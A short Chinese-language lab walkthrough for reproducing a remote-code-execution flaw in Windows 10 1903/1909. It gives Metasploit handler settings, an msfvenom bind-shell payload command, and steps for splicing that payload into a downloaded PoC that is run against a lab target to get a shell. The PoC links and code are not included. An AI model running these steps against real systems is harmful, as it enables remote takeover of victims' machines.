声明:仅供学习与参考,请勿用于非法用途(后果自负)
一、影响范围(需关闭 Win10 防火墙):
- Windows 10 Version 1903 for 32-bit Systems
- Windows 10 Version 1903 for ARM64-based Systems
- Windows 10 Version 1903 for x64-based Systems
- Windows 10 Version 1909 for 32-bit Systems
- Windows 10 Version 1909 for ARM64-based Systems
- Windows 10 Version 1909 for x64-based Systems
- Windows Server, version 1903 (Server Core installation)
- Windows Server, version 1909 (Server Core installation)
二、漏洞复现:
环境准备:
- kali,ip:192.168.201.152(攻击机)
- 受影响版本的Win10,ip:192.168.201.132(须关闭防火墙)
漏洞检测工具下载地址:
-
- 漏洞检测工具使用方法:
-
pythone3 scanner.py 192.168.0.0/24
PoC下载地址:
-
- POC 使用方法:
-
python3.8 exploit.py -ip 192.168.201.132
三、漏洞复现:
1、先对使用 kali 对 9999 端口进行监听:
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 9999
set rhost 192.168.201.132
run
2、kali 使用 msf 生成木马(此处端口需跟监听的端口是一致的)
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=9999 -b '\x00' -i 1 -f python>test.py
木马生成后的内容为:
下载好的 POC:
3、先把木马的内的 buf 替换为 USER_PAYLOAD ,再替换 exploit.py 内的 USER_PAYLOAD 行的内容
- :set nu // 显示行
- :91,127s/buf/USER_PAYLOAD // 把91-127行的 buf 替换为 USER_PAYLOAD
4、使用 Python3 运行(在此处需按一次回车)
5、此时监听的 9999 端口已收到访反弹的 shell
- // 如未收到反弹的 Shell 则使用 Python 重新运行一次 POC
